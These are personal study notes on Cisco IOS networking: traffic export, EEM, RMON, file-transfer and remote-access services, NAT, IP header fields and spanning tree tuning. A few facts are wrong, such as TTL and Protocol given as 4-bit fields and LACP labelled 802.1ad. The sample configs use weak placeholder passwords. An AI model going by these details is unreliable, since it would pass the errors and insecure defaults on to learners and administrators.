c6500(config)# mls flow ip interface-full
c6500(config)# mls nde sender version 5 ! Netflow Data Export

Implementing Router IP Traffic Export

RITE is like SPAN for switches but for routers (only IP traffic is replicated).

Router(config)# ip traffic-export profile EXPORT
Router(conf-rite)# interface FastEthernet0/0
Router(conf-rite)# bidirectional
Router(conf-rite)# incoming sample one-in-every 5
Router(conf-rite)# outgoing sample one-in-every 5
Router(conf-rite)# mac-address aaa0.bbb.cccc
Router(config)# interface Serial0/0
Router(config-if)# ip traffic-export apply EXPORT

Implementing Cisco IOS Embedded Event Manager

Tracks and classifies events on a router and provides notifications.
EEM overlaps with RMON functionality, but is considered more powerful and flexible.

Router(config)# event manager applet CLI-copy_run_start
Router(config-applet)# event cli pattern "wr" sync yes
Router(config-applet)# action 1 syslog msg "$_cli_msg Command Executed"
Router(config-applet)# set 2 _exit_status 1
Router(config-applet)# end

Implementing Remote Monitoring

RMON enables to configure thresholds for alerting based on SNMP objects.
RMON is divided into two classes: alarms and events.
You set the rising and falling thresholds for events, and then tell RMON which alarm to trigger.

Router(config)# rmon event 1 log trap public description Fa0.0RisingErrors owner config
Router(config)# rmon event 2 log trap public description Fa0.0FallingErrors owner config
Router(config)# rmon event 3 log trap public description Se0.0RisingErrors owner config
Router(config)# rmon event 4 log trap public description Se0.0FallingErrors owner config
Router(config)# rmon alarm 20 ifInErrors.1 60 delta rising-threshold 10 1 falling-threshold 5 2 owner config
Router(config)# rmon alarm 30 ifInErrors.2 60 absolute rising-threshold 20 3 falling-threshold 10 4 owner config
Router# show rmon alarm
Router# show rmon event

Implementing and Using FTP on a Router

Router(config)# ip ftp username Joe
Router(config)# ip ftp password cisco
Router(config)# ip ftp passive
Router(config)# exception protocol ftp
Router(config)# exception region-size 65536
Router(config)# exception dump 172.30.1.1

Implementing a TFTP Server on a Router

Router(config)# tftp-server flash:c1700-advipservicesk9-mz.124-23.bin alias c1700.bin 10

Implementing Secure Copy Protocol

Router(config)# hostname Secure
Secure(config)# ip domain-name lab.net
Secure(config)# crypto key generate rsa general-keys modulus 1024
Secure(config)# aaa authentication login default local
Secure(config)# aaa authorization exec default local
Secure(config)# username admin privilege 15 secret 0 MYSECRET
Secure(config)# ip scp server enable

Implementing HTTP and HTTPS Access

Router(config)# ip http server
Router(config)# ip http port 8080
Router(config)# ip http access-class 100
Router(config)# ip http client username Joe
Router(config)# ip http client password cisco
Router(config)# ip http authentication [aaa | local | enable | tacacs]
Router(config)# ip http secure-server
Router# show ip http server secure status

Implementing Telnet Access

Router(config)# access-list 100 deny tcp any any eq 23
Router(config)# access-list 100 permit tcp any any eq 3010
Router(config)# access-list 100 deny ip any any
Router(config)# line vty 0 4
Router(config-line)# rotary 10 queued ! Telnet port == 3000 + rotary group
Router(config-line)# access-class 100 in

Implementing SSH Access

Secure(config)# access-list 100 deny tcp any any eq 22
Secure(config)# access-list 100 permit tcp any any eq 2010
Secure(config)# access-list 100 deny ip any any
Secure(config)# line vty 0 4
Secure(config-line)# rotary 10 queued ! SSH port == 2000 + rotary group
Secure(config-line)# access-class 100 in
Secure(config-line)# transport input ssh

# IP Addressing

IP Addressing and Subnetting Review

Class A: 1-126/8
Class B: 128-191/16
Class C: 192-223/24
Class D: 224-239
Class E: 240-255

Static NAT

Does not help with IP address conservation, but makes and inside server available to client on the Internet.
Router(config)# interface ethernet0/0
Router(config-if)# ip nat inside
Router(config)# interface serial0/0
Router(config-if)# ip nat outside
Router(config)# ip nat inside source static 10.1.1.1 200.1.1.1

Dynamic NAT Without PAT

Like static NAT but uses a pool of addresses to assign dynamically.

Dynamic NAT and PAT Configuration

Router(config)# interface ethernet0/0
Router(config-if)# ip nat inside
Router(config)# interface serial0/0
Router(config-if)# ip nat outside
Router(config)# access-list 1 permit 10.1.1.0 0.0.0.255
Router(config)# ip nat pool NATPOOL 200.1.1.1 200.1.1.2 netmask 255.255.255.252
Router(config)# ip nat inside source list 1 pool NATPOOL

Command Reference

Router(config)# ip nat inside destination list {access-list-number | name} pool name
Router# show ip nat statistics
Router# show ip nat translations
Router# clear ip nat translation ?

IP Header

- Version (4b)
- Header Length (4b): Defines the length of the IP header, including optional fields.
- DS Field (8b): Differentiated Services Field, originally called Type of Service (ToS).
- Packet Length (16b): Defines the length of the IP packet, including the data.
- Identification (16b): All fragments of the original packet contain the same identifier.
- Flags (3b): Fragmentation flags.
- Fragment Offset (13b): Identifies the fragment location in the original packet.
- Time to Live (4b)
- Protocol (4b): Identifies the contents of the data field.
- Header Checksum (16b): Frame Check Sequence of the IP header (not the data).
- Source IP Address (32b)
- Destination IP Address (32b)
- Optional Header Fields and Padding (multiple of 4Bytes): For future expansion via optional headers.

IP Protocol Field Values

- ICMP: 1
- TCP: 6
- UDP: 17
- EIGRP: 88
- OSPF: 89
- PIM: 103

# 802.1d Spanning Tree Protocol

Choosing Which Ports Forward

1. Elect the root switch: lowest bridge ID wins.
2. Determine each switch's Root Port: the one port on each switch with the least cost path back to the root.
3. Determine the Designated Port for each segment: the port of the switch that forwards the least cost Hello onto a segment.

Electing a Root Switch

Each switch begins sending STP Hello BPDU.
When a switch hears a superior Hello, it stops claiming to be root and starts forwarding the superior Hellos.

The original 802.1d bridge ID has two fields:

- Priority (2B)
- System ID == MAC Address (6B)

The original 802.1d has been redefined:

- Priority, multiple of 4096 (4b)
- System ID Extension == VLAN ID (12b)
- System ID == MAC Address (6B)

Determining the Root Port

The root send a Hello every Hello timer (2 seconds by default).
Each switch that receives a Hello forwards it after updating:

- Cost (received cost + port cost of the port on which the hello was received)
- Bridge ID (forwarder's BID)
- Port priority (forwarder's port priority)
- Port number (forwarder's port number)

Port costs:
Original IEEE Cost    Revised IEEE Cost
10 Mbps  100                   100
100 Mbps 10                    19
1 Gbps   1                     4
10 Gbps  1                     2

Tiebreakers to elect the Root Port:

- Use the port with the least cost to the root.
- If the cost is equal, use the port with the lowest BID.
- If the BID is the same, use the port with the lowest priority.
- If the priority is equal, use the port with the lowest port number.

Switch(config)# no spanning-tree vlan 10
Switch(config-if)# spanning-tree vlan 11 cost 10
Switch(config-if)# spanning-tree vlan 12 port-priority 120

Determining the Designated Port

The switch that forwards Hellos onto a LAN segment is called the designated switch and the port onto that segment is called the Designated Port (DP).
The DP sends the lowest advertised cost.
The tiebreakers are the same.

Converging to a New STP Topology

If a switch does not receive Hellos over a RP during max age timer (by default 20 seconds), it begins a new root election by claiming to be the root and flooding Hellos out every port.
If it does not receive Hellos over a Blocking port during max age timer, it changes to listening state on that port.

Topology Change Notification and Updating the CAM

- A switch experiencing a port state change send a TCN (Topology Change Notification) BPDU out its Root Port. It repeats this message every Hello time until it is acknowledged.
- A designated switch receiving that TCN BPDU sends back a normal Hello BPDU marking the TCA (Topology Change Acknowledgment) bit.
- The process is repeated until the root receives a TCN BPDU. One received, the root set the TC (Topology Change) bit on the next Hellos. A switch receiving a Hello BPDU with TC bit set times out entries in the CAM.

Transitioning from Blocking to Forwarding

The switch waits forward delay timer (by default 15 seconds) before changing from Listening/Learning port states.
802.1d port states:
Forwards data frames?   Learns source MACs?   Stable?
Blocking   No                      No                    Stable
Listening  No                      No                    Transitory
Learning   No                      Yes                   Transitory
Forwarding Yes                     Yes                   Stable
Disabled   No                      No                    Stable

Per-VLAN Spanning Tree and STP over Trunks

802.1Q does not support PVST+ natively, however, Cisco switches do.
Non-Cisco switches using 802.1Q run only one STP instance (Common Spanning Tree) over VLAN 1 for all VLANs.
Two PVST+ regions, separated by a single CST region, share PVST+ information sending BPDUs using a multicast destination MAC (01:00:0c:cc:cc:cd) and being VLAN tagged.
Non-Cisco switches do not interpret these BPDUs but Cisco switches do.
Non-Cisco switches using 802.1Q support multiple STP instances with 802.1s (MST).

Switch(config)# spanning-tree mode pvst

STP Configuration and Analysis

Default STP priority is 32768.
Switch(config)# spanning-tree vlan 1 root {primary | secondary } [diameter]
primary sets the priority to 24576 if the current root has a priority larger than 24576 else sets 4096 less than the current root priority.
secondary sets the priority to 28672.
diameter calculates new STP timers based on the max number of switches/hops (by default 7 switches) between two end stations.

Optimizing Spanning Tree

Convergence might take between 30 and 50 seconds.

PortFast, UplinkFast, and BackboneFast

These Cisco-propietary features solve specific STP problems.

- PortFast: Used on access ports. Immediately puts the port into forwarding state.
- UplinkFast: Used on access switches. Immediately replaces a lost Root Port with an alternate Root Port.
- BackboneFast: Used to detect indirect link failures. Avoids waiting for Maxage when a Root Port ceases to receive Hellos.

PortFast

To be safe, also enable the BPDU Guard and Root Guard features.

UplinkFast

The command takes three actions:

- Increases the root priority to 49152.
- Sets the port cost to 3000.
- Tracks alternate Root Ports.

When the Root Port fails, the switch fails over to an alternate Root Port and forwards immediately.
Also, the switch sends fake frames (station MAC entries as source and 01:00:0c:cd:cd:cd as multicast destination) to update the other switches CAM table (does not use the TCN process).

BackboneFast

When the first Hello goes missing, a BackboneFast switch sends a Root Link Query BPDU asking the neighboring switch about a direct link failure. Once known, converges without waiting Maxage timer. All switches must have BackboneFast configured.

PortFast, UplinkFast, and BackboneFast Configuration

Switch(config-if)# spanning-tree portfast
Switch(config)# spanning-tree portfast default
Switch(config)# spanning-tree uplinkfast [max-update-rate rate]
Switch(config)# spanning-tree backbonefast

Load Balancing Across PortChannels

Load balancing is based on the contents of layer 2, 3 and/or 4 headers.
The goal is to use a blancing method for which the fields in the frame vary.

Switch(config)# port-channel load-balance {src-mac | dst-mac | src-dst-mac \ 
| src-ip | dst-ip | src-dst-ip \
| src-port | dst-port | src-dst-port | mpls}

PortChannel Discovery and Configuration

The dynamic protocols are Port Aggregation Protocol (PAgP) and Link Aggregation Control Protocol (LACP ~ 802.1ad).

Switch(config-if)# channel-protocol {lacp | pagp}

PAgP      LACP     Action
on        on       Disables PAgP and LACP. Forces the port into the PortChannel.
off       off      Disables PAgP and LACP. Prevents the port from being part of a PortChannel.
auto      passive  Uses PAgP or LACP. Waits on the other side messages.
desirable active   Uses PAgP or LACP. Initiates the negotiation.

Several items must be identical on the links to be added to the PortChannel:

- Same speed and duplex
- If not trunking, same access VLAN
- If trunking, same trunk type, allowed VLANs and native VLAN
- The same STP cost per VLAN
- No SPAN configured

Rapid Spanning Tree Protocol

IEEE 802.1w improves STP convergence and is backward compatible with 802.1d.
The key components are:

- Waiting only 3 misses Hellos on a RP before reacting (versus 10 missed with 802.1d).
- Bypassing the 802.1d listening state (discarding -> learning).
- Inclusion Cisco features: PortFast, UplinkFast and BackboneFast (RLQ).
- Backup Designated Port feature

Link types:

- Point-to-point: connects a switch to one other switch: spanning-tree link-type point-to-point
- Shared: connects a switch to a hub.
- Edge: spanning-tree portfast

Port states:

- Discarding
- Learning
- Forwarding

Port roles:

- Root Port
- Designated Port
- Alternate Port: Backup Root Port (UplinkFast)
- Backup Port: Backup Designated Port

RPVST+ and MST uses 802.1w.

Switch(config)# spanning-tree mode rapid-pvst

Rapid Per-VLAN Spanning Tree Plus (RPVST+)

RPVST+ is compatible with MSTP and PVST+.

Multiple Spanning Trees: 802.1s

Two switches belong to the same MST region if they use the same region name, the same revision number and the same configured instances.
When connecting an MST region to a non-MST region or to a different MST region, MST makes the MST region appear to be a single switch. This STP instance is called the Internat Spanning Tree (IST).

Switch(config)# spanning-tree mode mst

Root Guard and BPDU Guard: Protecting Access Ports

- BPDU Guard: does not recover from err-disabled state.
- Root Guard: recovers from loop-inconsistent state when the superior BPDUs are no longer received.

UDLD and Loop Guard: Protecting Trunks

- UDLD normal mode: puts the port into unknown state.
- UDLD aggressive mode: puts the port into error-disabled state and ceases sending traffic.
- Loop Guard: when normal BPDUs are no longer received, the port does not go through normal STP convergence, but rather falls into loop-inconsistent state.

Troubleshooting Using Basic Interface Statistics

Switch# show interface
Switch# show controllers

Troubleshooting Spanning Tree Protocol

Switch# show spanning-tree root
Switch# show interfaces status err-disabled
Switch# show spanning-tree inconsistentports

Troubleshooting Trunking

Switch# show interfaces switchport
Switch# show spanning-tree inconsistentports
Switch# show interfaces trunk

Troubleshooting VTP

Switch# show vtp status

Troubleshooting EtherChannels

Switch# show etherchannel summary
Switch# show interface etherchannel
Switch# show interface port-channel 1